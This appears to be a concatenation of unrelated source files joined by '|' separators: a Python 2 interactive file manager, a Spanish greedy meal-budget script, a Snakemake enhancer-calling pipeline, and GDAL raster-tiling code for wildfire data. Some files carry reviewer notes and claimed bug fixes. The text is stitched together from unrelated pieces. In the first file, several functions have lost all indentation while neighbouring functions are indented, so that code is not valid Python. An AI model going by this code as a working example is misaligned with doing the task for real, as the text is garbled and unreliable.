if filename in os.listdir(source):
dest = raw_input("Enter the destination/destination and filename/filename:") # location of the copied file
try:
shutil.copy(filename, dest) # copying the file to its new location
print "DONE SUCCESFULLY!!!"
except shutil.Error: # error handling in case the directry is not changed and the new name is not given
print "You are trying to copy the file in the same directory but without giving a name"
except IOError: # error handling if directory does not exist
print "No such directory"
else:
print "No such file"
############################################################################
def move():
source = raw_input("enter the location of file u want to move:")# location of file
try:
os.chdir(source) # going to that directory
except OSError: # error handling in case that dorectory does not exist
print "No such directory"
else:
filename = raw_input("enter the name of file:") # entering the name of the file
dest = raw_input("enter the directory u want to move to:") # the new location of the file
try:
shutil.move(filename, dest) # moving file
print "DONE SUCCESFULLY!!!"
except IOError: # error handling if the directory or the file does not exist
print "No such file or directory"
#############################################################################
def append():
source = raw_input("enter the location of text file:") # location of text file
try:
os.chdir(source) # going to that location
except OSError: # error handling if the directory does not exist
print "No such directory"
else:
filename = raw_input("Enter the name of textfile:") # entering name of the textfile
try:
file = open(filename, "r+") # opening that file in read+ mode. read+ mode allows the user append to the textfile
except IOError: # error handling if the fil e does not exist
print "There is no such file in the directory"
else:
str = raw_input("type what u want to append to the textfile:") # entering words or sentences that user wants to add to the text file
file.write(str) # writing to a textfile
file.close() # closing a textfile
print "DONE SUCCESFULLY!!!"
#############################################################################
def insert_to_spec_pos():
    # Insert user text into a text file after a user-chosen character
    # offset, by splitting the file at that offset and rewriting it as
    # prefix + " text " + suffix.
    source = raw_input("Enter a location of filename:") # directory of the text file
    try:
        os.chdir(source)# go to that directory
    except OSError:# the directory does not exist
        print "No such directory"
    else:
        txt = raw_input("enter name of txt file:") # name of the text file
        try:
            file = open(txt, "r+")# "r+" raises IOError for a missing file
        except IOError: # the file does not exist
            print "No such file in the directory"
        else:
            str = raw_input("add text:") # text to insert (shadows builtin str)
            # NOTE(review): Python-2 input() evaluates the typed expression;
            # only an int result is accepted below.
            position = input("insert position with an integer:")
            if type(position) == int: # reject non-integer positions
                start = file.read(position) # everything before the insert point
                file.seek(position, 0) # redundant: read() already left us here
                end = file.read() # everything after the insert point
                file.close()
                # Reopen in "w" to truncate, then rewrite the three parts.
                file = open(txt, "w")
                file.write(start)
                file.write(" "+str+" ") # the insertion, padded with spaces
                file.write(end)
                file.close()
                print "DONE SUCCESFULLY!!!"
            else:
                print "position should be specified with an integer"
###################################################################
def remove_content_of_textfile():
source = raw_input("enter the location of text file:") # location of textfile
try:
os.chdir(source) # going to that directory
except OSError: #error handling if the directory does not exist
print "No such directory"
else:
filename = raw_input("Enter the name of textfile:") # enetring the name of file
if filename in os.listdir(source): # to check if the file is in the directory
open(filename, 'w') # opening the textfile in write mode so the content of textfile will be deleted
print "DONE SUCCESFULLY!!!"
else:
print "No such file in directory"
#####################################################################
def show_content_per_page():
    # Display a text file a fixed number of lines at a time, pausing
    # between pages until the user stops answering "yes".
    source = raw_input("Enter the location of text file:") # directory of the text file
    try:
        os.chdir(source) # go to that directory
    except OSError: # the directory does not exist
        print "No such directory"
    else:
        file = raw_input("enter the name of textfile:") # name (shadows builtin file)
        try:
            txt = open(file, "r") # open for reading
        except IOError: # the file does not exist
            print "No such file in the directory"
        else:
            # NOTE(review): Python-2 input() evaluates the typed expression;
            # only an int result is accepted below.
            page = input("specify the number of lines per page with an integer:")
            if type(page) == int: # reject non-integer page sizes
                list = [] # one entry per file line (shadows builtin list)
                for i in txt:
                    list.append(i.splitlines()) # each entry is a 1-element list
                index = 0 # index of the next line to print (0-based)
                decision = "yes" # sentinel so the while loop runs at least once
                while decision == "yes":
                    for i in range(page): # print up to `page` lines
                        if index<len(list): # guard against running past the end
                            var = str(list[index][0]) # the line text itself
                            print var
                            index+=1 # advance to the next line
                    if index == len(list): # everything has been printed
                        print "it is the last line"
                        break
                    decision = raw_input("type yes if you want to continue, if not type something else:") # keep paging?
            else:
                print "page shpuld be specified with an integer"
###################################################################
def pofm():
    """Interactive menu for the file-management helpers above.

    Behaviour is identical to the original ~130-line chain of copy-pasted
    if-blocks: a known number runs the operation, "<n>/help" prints the
    matching help text, anything else silently returns.  After any known
    choice the user is asked whether to continue; "yes" recurses.
    """
    # Menu number -> operation to run.
    operations = {
        "1": create,
        "2": delete,
        "3": rename,
        "4": copy,
        "5": move,
        "6": append,
        "7": insert_to_spec_pos,
        "8": remove_content_of_textfile,
        "9": show_content_per_page,
    }
    # "<n>/help" -> explanation text (reproduced verbatim from the original).
    help_texts = {
        "1/help": "With this function you can easily create a file in any directory by entering directory and file name. You cannot create the second file with the same name in the same directory",
        "2/help": "You can use this operation to delete any file in any directory",
        "3/help": "Choose this operation to rename a file in a chosen directory.",
        "4/help": "With this function you can create a copy of chosen file either in the same directory but with different name or in the other directory with the same name or a different one.\nTo create in the same directory you only need to enter filename,\nto create in the other directory you can either give path or path with filename.",
        "5/help": "You can change a location of file with this function. But if you give just filename when the program wants a destination from you, it will not change directory and the name of file will be changed.\nYou need to give path to move a file!",
        "6/help": "To append a text to the end of any text file, you just need to give location and name of that file",
        "7/help": "Let's say you want to add text to the text file for example after first 15 characters, not to the beginning or the end. This function will do it for you. You need to enter the location, the name of text file and the the number of characters that you want to insert after.",
        "8/help": "Enter the location and the name of text file and delete whatever in it.",
        "9/help": "You can divide text file into pages by defining line count per page and to vies that text file page by page",
    }
    x = raw_input("Available operations:\n1)create()\n2)delete()\n3)rename()\n4)copy()\n5)move()\n6)append()\n7)insert_to_spec_pos()\n8)remove_content_of_textfile()\n9)show_content_per_page()\nTo use any operation type corresponding number\nIf you want to get a help for any of the operations shown above type corresponding number and slash help,i.e(1/help):")
    if x in operations:
        operations[x]()
    elif x in help_texts:
        print(help_texts[x])
    else:
        # Unrecognised input: the original fell through every if-block and
        # returned without prompting.
        return
    y = raw_input("Do you want to continue (yes) or (no):")
    if y == "yes":
        pofm()
    else:
        print("See you later :)")
pofm()
|
def get_platos_y_dinero():
    """Pide al usuario el numero de platos y el dinero a gastar.

    Python-2 input() evaluates the typed text, so numeric entry yields ints.
    """
    return (input("Cuantos platos se sirven hoy? "),
            input("Cuanto dinero va a gastar?: "))
# Plate i costs 2**i: spend the budget greedily from the most expensive
# affordable plate downwards.  Slicing with platos never raises even when
# platos exceeds the list length.
prices = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]
platos, dinero_disponible = get_platos_y_dinero()
total_platos = 0
for i in reversed(prices[0:platos]):
    # NOTE(review): relies on Python-2 integer division -- dinero/i
    # truncates, and the subtraction leaves dinero % i, so each price is
    # visited exactly once.
    while dinero_disponible/i > 0:
        total_platos += dinero_disponible/i
        dinero_disponible -= i*(dinero_disponible/i)
print "Numero de platos:", total_platos
|
#####################################################
## samples.tsv
# sample assembly descriptive_name cell
# CMC_ATAC hg38 CMC_ATAC CMC
# CMC_H3K27ac hg38 CMC_H3K27ac CMC
# KRT_p300 hg38 KRT_p300 KRT
#####################################################
## Snakefile
import os
import pandas as pd
configfile: "config.yaml"
# do onstart/onexit things
sample_schemas = ['sample', 'assembly', 'strandedness', 'condition']
config_schemas = ['general', 'download', 'alignment_general', 'peakcalling', 'trackhub']
include: "../../rules/configuration.smk"
# load all the relevant rules
include: f"{config['rule_dir']}/alignment.smk"
include: f"{config['rule_dir']}/call_peak.smk"
include: f"{config['rule_dir']}/get_genome.smk"
include: f"{config['rule_dir']}/get_fastq.smk"
include: f"{config['rule_dir']}/merge_replicates.smk"
include: f"{config['rule_dir']}/peak_count.smk"
include: f"{config['rule_dir']}/qc.smk"
include: f"{config['rule_dir']}/trackhub.smk"
include: f"{config['rule_dir']}/trimming.smk"
include: f"{config['rule_dir']}/pananse.smk"
# set the quality_control functions (consumed by the multiqc aggregation)
quality_control = [get_trimming_qc, get_alignment_qc, get_peak_calling_qc]
# NOTE(review): "enahncer" is a typo for "enhancer", but it is baked into
# the rule name and the target paths below, so it is kept for compatibility.
rule call_enahncer_all:
    """
    Call enhancers for each sample (or condition, if applicable).
    """
    input:
        expand((["{result_dir}/trackhub"] if config['create_trackhub'] else []) +
               (["{qc_dir}/multiqc_{assemblies}.html"] if config["create_qc_report"] else []) +
               ["{result_dir}/enhancer/{assemblies}-{cell}_enahncer.bed"],
               **{**config,
                  **{'assemblies': set(samples['assembly']), 'peak_caller': config['peak_caller'].keys(), 'cell': set(samples.cell)}})
#####################################################
## Code in pananse.smk
import os
# NOTE(review): these two rules declare the IDENTICAL output file
# ({assembly}-{cell}_sort.bdg), which Snakemake treats as an ambiguous /
# conflicting rule pair.  They can be merged into ONE rule by adding a
# {mark} wildcard (mark = p300 | H3K27ac) to both the input
# (..._{mark}_treat_pileup.bdg) and a mark-specific output name.
rule sort_bdg_p300:
    """
    Sort the p300 bedGraph produced by macs2 (required by bedGraphToBigWig).
    """
    input:
        bdgfile = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_p300_treat_pileup.bdg", **config)
    output:
        sortbdgfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_sort.bdg", **config)
    shell:
        "sort -k1,1 -k2,2n {input.bdgfile} > {output.sortbdgfile}"
rule sort_bdg_h3k27ac:
    """
    Sort the H3K27ac bedGraph produced by macs2 (same output as above!).
    """
    input:
        bdgfile = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_H3K27ac_treat_pileup.bdg", **config)
    output:
        sortbdgfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_sort.bdg", **config)
    shell:
        "sort -k1,1 -k2,2n {input.bdgfile} > {output.sortbdgfile}"
rule bdg2wig:
    """
    Convert the sorted bedGraph to bigWig.

    NOTE(review): bedGraphToBigWig emits bigWig despite the .wig file name
    here -- presumably intentional, since bigWigSummary consumes it later.
    """
    input:
        sortbdgfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_sort.bdg", **config),
        genome_size = expand("{genome_dir}/{{assembly}}/{{assembly}}.fa.sizes", **config)
    output:
        wigfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}.wig", **config)
    conda:
        "../envs/pananse.yaml"
    shell:
        "bedGraphToBigWig {input.sortbdgfile} {input.genome_size} {output.wigfile}"
# NOTE(review): the two rename rules below share the identical output file
# (same ambiguity as the sort rules), and `mv` destroys the macs2 input,
# which breaks Snakemake re-runs; a {mark} wildcard plus `cp` would fix both.
rule rename_peak_atac:
    input:
        narrowpeak_atac = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_ATAC_peaks.narrowPeak", **config)
    output:
        narrowpeak = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_peaks.narrowPeak", **config)
    shell:
        "mv {input.narrowpeak_atac} {output.narrowpeak}"
rule rename_peak_p300:
    input:
        narrowpeak_p300 = expand("{result_dir}/macs2/{{assembly}}-{{cell}}_p300_peaks.narrowPeak", **config)
    output:
        narrowpeak = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_peaks.narrowPeak", **config)
    shell:
        "mv {input.narrowpeak_p300} {output.narrowpeak}"
def read_chrsize(sizefile):
    """Parse a two-column chrom-sizes file into a {chrom: size} dict."""
    sizes_by_chrom = {}
    with open(sizefile) as handle:
        for row in handle:
            fields = row.split()
            sizes_by_chrom[fields[0]] = int(fields[1])
    return sizes_by_chrom
rule make_enhancer:
    # Score a +/-100 bp window around every narrowPeak summit with the
    # maximum bigWig signal, writing BED-like lines chrom<TAB>start<TAB>end<TAB>score.
    input:
        narrowpeak = expand("{result_dir}/tmp/{{assembly}}-{{cell}}_peaks.narrowPeak", **config),
        wigfile = expand("{result_dir}/tmp/{{assembly}}-{{cell}}.wig", **config),
        genome_size = expand("{genome_dir}/{{assembly}}/{{assembly}}.fa.sizes", **config)
    output:
        enhancerbed = expand("{result_dir}/enhancer/{{assembly}}-{{cell}}_enahncer.bed", **config)
    # conda:
    #     "../envs/pananse.yaml"
    run:
        chrsizedic = read_chrsize(input.genome_size[0])
        with open(str(input.narrowpeak)) as bdgf, open(str(output.enhancerbed),"w") as enh_bed:
            for line in bdgf:
                a = line.split()
                # narrowPeak column 10 is the summit offset relative to
                # column 2 (the peak start), so this is the absolute summit.
                peak = int(a[9]) + int(a[1])
                start = peak - 100
                end = peak + 100
                # Skip windows that fall off either chromosome edge.
                # NOTE(review): chrsizedic[a[0]] raises KeyError if the peak
                # file names a chromosome missing from the sizes file.
                if start>0 and chrsizedic[a[0]]>end:
                    # NOTE(review): hard-coded user path -- should come from config.
                    commd = "/home/qxu/bin/ucsc/bigWigSummary -type=max {wig} {chrname} {start} {end} 1".format(wig=str(input.wigfile), chrname=a[0], start=start, end=end)
                    commd_result = os.popen(commd)
                    r = commd_result.read()
                    if r != "":
                        # r presumably keeps bigWigSummary's trailing
                        # newline, which terminates the written line.
                        enh_bed.write("{chrname}\t{start}\t{end}\t{score}".format(chrname=a[0], start=start, end=end, score=str(r)))
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 11 14:41:16 2018
@author: JHodges
"""
import geopandas as gpd
import matplotlib.pyplot as plt
import gdal
import skimage.transform as skt
import numpy as np
from generate_dataset import GriddedMeasurement
import scipy.interpolate as scpi
import behavePlus as bp
import os
import glob
import struct
import matplotlib.path as mpltPath
from shapely.geometry import Polygon, Point
import datetime
import subprocess
def readImgFile(imgFile):
    """Read a GDAL raster, downsample it 5x, and return (band, lat, lon).

    The raster's native projection is converted to WGS84 so the returned
    lat/lon arrays give the geographic position of each downsampled pixel.
    """
    img = gdal.Open(imgFile)
    band = np.array(img.ReadAsArray(),dtype=np.float32)
    # Negative values act as no-data sentinels here -- mask them out.
    band[band<0] = np.nan
    old_cs = gdal.osr.SpatialReference()
    old_cs.ImportFromWkt(img.GetProjectionRef())
    # Target coordinate system: plain WGS84 lat/lon.
    wgs84_wkt = """
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.01745329251994328,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]]"""
    new_cs = gdal.osr.SpatialReference()
    new_cs.ImportFromWkt(wgs84_wkt)
    # NOTE(review): the prints below look like leftover debugging output.
    print(old_cs)
    print(new_cs)
    transform = gdal.osr.CoordinateTransformation(old_cs,new_cs)
    width = img.RasterXSize
    height = img.RasterYSize
    gt = img.GetGeoTransform()
    # Pixel-corner coordinates in the raster's native projection
    # (gt = GDAL geotransform: origin + per-pixel step).
    x = np.linspace(0,width,width+1)
    y = np.linspace(0,height,height+1)
    x = gt[0] + x*gt[1]
    y = gt[3] + y*gt[5]
    xGrid, yGrid = np.meshgrid(x,y)
    # Downsample by 5 in both axes to keep the coordinate transform cheap.
    ds = 5
    xGridDs = xGrid[::ds,::ds]
    yGridDs = yGrid[::ds,::ds]
    bandDs = band[::ds,::ds]
    sz = xGridDs.shape
    # Flatten to an (N, 2) point list for the bulk transform.
    xGrid_rs = np.reshape(xGridDs,(xGridDs.shape[0]*xGridDs.shape[1],))
    yGrid_rs = np.reshape(yGridDs,(yGridDs.shape[0]*yGridDs.shape[1],))
    points = np.array([xGrid_rs,yGrid_rs]).T
    print(points[0])
    latlong = np.array(transform.TransformPoints(points))
    print(latlong[0])
    # Reshape back onto the downsampled grid (column 1 = lat, 0 = lon).
    lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
    lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
    return bandDs, lat, lon
#data, lat, lon = gridAndResample(bandDs,lat,lon)
#data2 = GriddedMeasurement(None,lat,lon,data,'FuelModel')
#data2.dataName = 'FuelModel'
#return data2
def getExtents(imgFile):
    """Load a GDAL raster, downsample 5x, return (band, lat, lon) in WGS84.

    Mirrors readImgFile without its debug output.  BUG FIX: the band read
    had been commented out while ``band`` was still used for downsampling
    below, which raised a NameError -- it is restored here.
    """
    img = gdal.Open(imgFile)
    band = np.array(img.ReadAsArray(),dtype=np.float32)
    # Negative values act as no-data sentinels here -- mask them out.
    band[band<0] = np.nan
    old_cs = gdal.osr.SpatialReference()
    old_cs.ImportFromWkt(img.GetProjectionRef())
    # Target coordinate system: plain WGS84 lat/lon.
    wgs84_wkt = """
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.01745329251994328,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]]"""
    new_cs = gdal.osr.SpatialReference()
    new_cs.ImportFromWkt(wgs84_wkt)
    transform = gdal.osr.CoordinateTransformation(old_cs,new_cs)
    width = img.RasterXSize
    height = img.RasterYSize
    gt = img.GetGeoTransform()
    # Pixel-corner coordinates in the raster's native projection.
    x = np.linspace(0,width,width+1)
    y = np.linspace(0,height,height+1)
    x = gt[0] + x*gt[1]
    y = gt[3] + y*gt[5]
    xGrid, yGrid = np.meshgrid(x,y)
    # Downsample by 5 in both axes to keep the coordinate transform cheap.
    ds = 5
    xGridDs = xGrid[::ds,::ds]
    yGridDs = yGrid[::ds,::ds]
    bandDs = band[::ds,::ds]
    sz = xGridDs.shape
    xGrid_rs = np.reshape(xGridDs,(xGridDs.shape[0]*xGridDs.shape[1],))
    yGrid_rs = np.reshape(yGridDs,(yGridDs.shape[0]*yGridDs.shape[1],))
    points = np.array([xGrid_rs,yGrid_rs]).T
    latlong = np.array(transform.TransformPoints(points))
    lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
    lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
    return bandDs, lat, lon
def splitImages(inDirs=None,namespace=None):
    """Split each <namespace>.tif in *inDirs* into four quadrant GeoTIFFs.

    Produces <namespace>_ul/_ur/_dl/_dr.tif next to each source file via
    gdal_translate -projwin.  The four copy-pasted command blocks of the
    original are collapsed into one loop; the commands issued are identical.
    """
    if inDirs is None:
        inDirs = ['E:/projects/wildfire-research/landfireData/US_140FBFM40/1/',
                  'E:/projects/wildfire-research/landfireData/US_140FBFM40/2/',
                  'E:/projects/wildfire-research/landfireData/US_140FBFM40/3/',
                  'E:/projects/wildfire-research/landfireData/US_140FBFM40/4/']
    if namespace is None:
        namespace = 'US_140FBFM40'
    for inDir in inDirs:
        files = glob.glob(inDir+namespace+'.tif')
        for file in files:
            img = gdal.Open(file)
            gt = img.GetGeoTransform()
            width = img.RasterXSize
            height = img.RasterYSize
            # Raster extents in projected coordinates, then midpoints.
            minX = gt[0]
            maxX = gt[0] + width*gt[1]
            minY = gt[3]
            maxY = gt[3] + height*gt[5]
            halfX = (maxX+minX)/2
            halfY = (maxY+minY)/2
            # (suffix, projwin corners) for the four quadrants.
            quadrants = [('ul', (minX, minY, halfX, halfY)),
                         ('ur', (halfX, minY, maxX, halfY)),
                         ('dl', (minX, halfY, halfX, maxY)),
                         ('dr', (halfX, halfY, maxX, maxY))]
            # NOTE(review): os.system with an interpolated string breaks on
            # paths with spaces; subprocess.run([...]) would be safer.
            for suffix, (x0, y0, x1, y1) in quadrants:
                cmd = "gdal_translate.exe %s%s.tif %s%s_%s.tif -projwin %.3f %.3f %.3f %.3f"%(inDir,namespace,inDir,namespace,suffix,x0,y0,x1,y1)
                os.system(cmd)
def generateLatLonImgs(file,outDir,namespace,debug=False):
    """Resample a projected raster onto 1x1-degree WGS84 tiles on disk.

    Each tile is written (or merged into an existing tile) as
    <outDir><namespace>_<lat>_<lon>.tif at resX x resY pixels.  BUG FIX:
    the original contained a leftover debugging ``assert False, "Stopped"``
    right after reading the projection, which made the whole function
    unreachable; that assert (and its debug print) have been removed.
    Returns the last tile's data array.
    """
    img = gdal.Open(file)
    band = np.array(img.ReadAsArray(),dtype=np.float32)
    old_cs = gdal.osr.SpatialReference()
    old_cs.ImportFromWkt(img.GetProjectionRef())
    # Target coordinate system: plain WGS84 lat/lon.
    wgs84_wkt = """
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.01745329251994328,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]]"""
    new_cs = gdal.osr.SpatialReference()
    new_cs.ImportFromWkt(wgs84_wkt)
    # Forward (native -> WGS84) and inverse (WGS84 -> native) transforms.
    transform = gdal.osr.CoordinateTransformation(old_cs,new_cs)
    iTf = gdal.osr.CoordinateTransformation(new_cs,old_cs)
    width = img.RasterXSize
    height = img.RasterYSize
    gt = img.GetGeoTransform()
    x = np.linspace(0,width,width)
    y = np.linspace(0,height,height)
    x = gt[0] + x*gt[1]
    y = gt[3] + y*gt[5]
    if debug:
        # Full lat/lon grids are only needed for the debug contour plots.
        xGrid, yGrid = np.meshgrid(x,y)
        sz = xGrid.shape
        xGrid_rs = np.reshape(xGrid,(xGrid.shape[0]*xGrid.shape[1],))
        yGrid_rs = np.reshape(yGrid,(yGrid.shape[0]*yGrid.shape[1],))
        points = np.array([xGrid_rs,yGrid_rs]).T
        latlong = np.array(transform.TransformPoints(points))[:,:-1]
        lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
        lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
    # Whole-degree lat/lon bounds fully contained in the raster corners.
    points = np.array(transform.TransformPoints([[x.min(),y.min()],[x.min(),y.max()],[x.max(),y.min()],[x.max(),y.max()]]))
    lat_b = np.ceil(np.min(points[:,1]))
    lat_u = np.floor(np.max(points[:,1]))
    lon_l = np.ceil(np.min(points[:,0]))
    lon_r = np.floor(np.max(points[:,0]))
    resX = 3700
    resY = 3700
    # Nearest-neighbour lookup in native coordinates (-9999 = no data).
    interpFunction = scpi.RegularGridInterpolator((-1*y,x),band,bounds_error=False,fill_value=-9999,method='nearest')
    driver = gdal.GetDriverByName('GTiff')
    for i in range(0,int(lat_u-lat_b)):
        for j in range(0,int(lon_r-lon_l)):
            latMin = lat_b+float(i)
            lonMin = lon_l+float(j)
            # Regular lat/lon grid for this 1x1 degree tile, mapped back to
            # native coordinates for sampling.
            yNew = np.linspace(latMin,latMin+1,resY)
            xNew = np.linspace(lonMin,lonMin+1,resX)
            yNewGrid, xNewGrid = np.meshgrid(yNew,xNew)
            xNewGrid_rs = np.reshape(xNewGrid,(xNewGrid.shape[0]*xNewGrid.shape[1],))
            yNewGrid_rs = np.reshape(yNewGrid,(yNewGrid.shape[0]*yNewGrid.shape[1],))
            points2 = np.array([xNewGrid_rs,yNewGrid_rs]).T
            ipoints2 = np.array(iTf.TransformPoints(points2))[:,:-1]
            ipoints2swap = np.array([ipoints2[:,1],ipoints2[:,0]]).T
            dataPoints_rs = interpFunction((-1*ipoints2swap[:,0],ipoints2swap[:,1]))
            dataPoints = np.reshape(dataPoints_rs,(resX,resY)).T
            # Encode negative coordinates with an 'n' prefix in the name.
            if latMin < 0:
                latStr = 'n%.0f'%(abs(latMin))
            else:
                latStr = '%.0f'%(abs(latMin))
            if lonMin < 0:
                lonStr = 'n%.0f'%(abs(lonMin))
            else:
                lonStr = '%.0f'%(abs(lonMin))
            name = outDir+namespace+'_%s_%s'%(latStr,lonStr)
            if len(glob.glob(name+'.tif')) > 0:
                # Tile exists: fill only its no-data pixels with new values.
                img2 = gdal.Open(name+'.tif')
                band2 = np.array(img2.ReadAsArray(),dtype=np.float32)
                dataPoints = dataPoints[::-1]
                band2[band2 == -9999] = dataPoints[band2 == -9999]
                dataPoints = band2[::-1]
                print("Found: %s, Merging."%(name))
            else:
                print("\tMaking %s"%(name))
            dataset = driver.Create(
                    name+'.tif',
                    resX,
                    resY,
                    1,
                    gdal.GDT_Float32, )
            dataset.SetGeoTransform((
                    lonMin,
                    1/resX,
                    0,
                    latMin+1,
                    0,
                    -1/resY))
            dataset.SetProjection(wgs84_wkt)
            dataset.GetRasterBand(1).WriteArray(dataPoints[::-1,:])
            dataset.FlushCache()
            if debug:
                plt.figure(figsize=(12,8))
                plt.subplot(1,2,1)
                plt.contourf(xNew,yNew,dataPoints); plt.clim([90,210]); plt.colorbar();
                plt.subplot(1,2,2)
                plt.contourf(lon[::10,::10],lat[::10,::10],band[::10,::10]); plt.clim([90,210]); plt.colorbar(); plt.xlim([lon_l+float(j),lon_l+float(j)+1]); plt.ylim([lat_b+float(i),lat_b+float(i)+1]);
    return dataPoints
def getHistogram(file):
    """Load a raster file and return its pixel values as a float32 array."""
    dataset = gdal.Open(file)
    return np.array(dataset.ReadAsArray(), dtype=np.float32)
def getTransformFromMtoD():
    """Return (Tf, iTf) transforms between CONUS Albers metres and WGS84.

    Tf maps the USGS Albers equal-area projection (metres) to WGS84
    degrees; iTf is the inverse (degrees to metres).
    """
    # Geographic target: plain WGS84 lat/lon.
    wgs84_wkt = """
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.01745329251994328,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]]"""
    # Projected source: USGS Albers equal-area over the contiguous US (NAD83).
    nad83_wkt = """
    PROJCS["USA_Contiguous_Albers_Equal_Area_Conic_USGS_version",
        GEOGCS["NAD83",
            DATUM["North_American_Datum_1983",
                SPHEROID["GRS 1980",6378137,298.2572221010042,
                    AUTHORITY["EPSG","7019"]],
                AUTHORITY["EPSG","6269"]],
            PRIMEM["Greenwich",0],
            UNIT["degree",0.0174532925199433],
            AUTHORITY["EPSG","4269"]],
        PROJECTION["Albers_Conic_Equal_Area"],
        PARAMETER["standard_parallel_1",29.5],
        PARAMETER["standard_parallel_2",45.5],
        PARAMETER["latitude_of_center",23],
        PARAMETER["longitude_of_center",-96],
        PARAMETER["false_easting",0],
        PARAMETER["false_northing",0],
        UNIT["metre",1,AUTHORITY["EPSG","9001"]]]"""
    new_cs = gdal.osr.SpatialReference()
    new_cs.ImportFromWkt(wgs84_wkt)
    old_cs = gdal.osr.SpatialReference()
    old_cs.ImportFromWkt(nad83_wkt)
    Tf = gdal.osr.CoordinateTransformation(old_cs,new_cs)
    iTf = gdal.osr.CoordinateTransformation(new_cs,old_cs)
    return Tf, iTf
def readAscFile(file,lat,lon,distance,debug=False):
    """Extract a square window from an ESRI ASCII grid around (lat, lon).

    Parameters
    ----------
    file : str
        Path to the .asc grid (projected coordinates, see getTransformFromMtoD).
    lat, lon : float
        Query point in WGS84 degrees.
    distance : float
        Half-width of the window in the grid's projected units.
    debug : bool
        Print index diagnostics when True.

    Returns
    -------
    (data, stringHeader) : (np.ndarray, str) or (None, None)
        (2N+1)x(2N+1) float32 window and a matching ASC header string, or
        (None, None) when the window does not fit inside the grid.
    """
    with open(file,'r') as f:
        lines = f.readlines()
    # Six-line ASC header; the value is the last space-separated token.
    nCols = float(lines[0].split(' ')[-1].split('\n')[0])
    nRows = float(lines[1].split(' ')[-1].split('\n')[0])
    xll = float(lines[2].split(' ')[-1].split('\n')[0])
    yll = float(lines[3].split(' ')[-1].split('\n')[0])
    fileDx = float(lines[4].split(' ')[-1].split('\n')[0])
    noDataValue = float(lines[5].split(' ')[-1].split('\n')[0])
    xur = xll + fileDx*nCols
    yur = yll + fileDx*nRows
    # Project the WGS84 query point into the grid's coordinate system.
    Tf, iTf = getTransformFromMtoD()
    queryPoint = iTf.TransformPoints([[lon,lat]])[0]
    bounds = Tf.TransformPoints([[xll,yll],[xll,yur],[xur,yll],[xur,yur]])
    # Grid indices of the query point; data row 0 is the top (max-y) row.
    centerX = int(np.round(nCols*(queryPoint[0]-xll)/(xur-xll)))
    centerY = int(nRows)-int(np.round(nRows*(queryPoint[1]-yll)/(yur-yll)))+1
    N = int(distance/fileDx)
    if debug:
        print("\tpoint\tx\t\ty")
        print("\tll\t%.0f\t%.0f"%(xll,yll))
        print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
        print("\tur\t%.0f\t%.0f"%(xur,yur))
        print("\tfull\t%.0f\t%.0f"%(nCols,nRows))
        print('cen\t%.0f\t%.0f'%(centerX,centerY))
    # Only proceed when the whole (2N+1)-cell window fits inside the grid.
    if centerY-N-2 > 0 and centerY+N+1 < nRows and centerX-N > 0 and centerX+N+1 < nCols:
        #if xll < queryPoint[0] and xur > queryPoint[0] and yll < queryPoint[1] and yur > queryPoint[1]:
        data = []
        # Data rows start after the 6 header lines; first token is blank
        # because rows begin with a space.
        for i in range(6+centerY-N,6+centerY+N+1):
            line = lines[i]
            lineSplit = line.split(' ')[1:]
            lineSplit[-1] = lineSplit[-1].split('\n')[0]
            data.append(lineSplit)
        data = np.array(data,dtype=np.float32)[:,centerX-N:centerX+N+1]
        #data[data == noDataValue] = np.nan
        # Regenerate an ASC header describing the extracted window.
        header = ['ncols %.0f\n'%(2*N+1),
                  'nrows %.0f\n'%(2*N+1),
                  'xllcorner %.12f\n'%(queryPoint[0]-N*fileDx),
                  'yllcorner %.12f\n'%(yll+(nRows-(centerY+N))*fileDx),
                  'cellsize %.12f\n'%(fileDx),
                  'NODATA_value %.0f'%(noDataValue)]
        stringHeader = ''
        for line in header:
            stringHeader = stringHeader+line
    else:
        print("Point is not contained in file.")
        print("\tpoint\tx\t\ty")
        print("\tll\t%.0f\t%.0f"%(xll,yll))
        print("\tqp\t%.0f\t%.0f"%(queryPoint[0],queryPoint[1]))
        print("\tur\t%.0f\t%.0f"%(xur,yur))
        data = None
        stringHeader = None
    return data,stringHeader
def readFullAscFile(file,lat=None,lon=None,debug=False):
    """Read an entire ESRI ASCII grid into a float32 array.

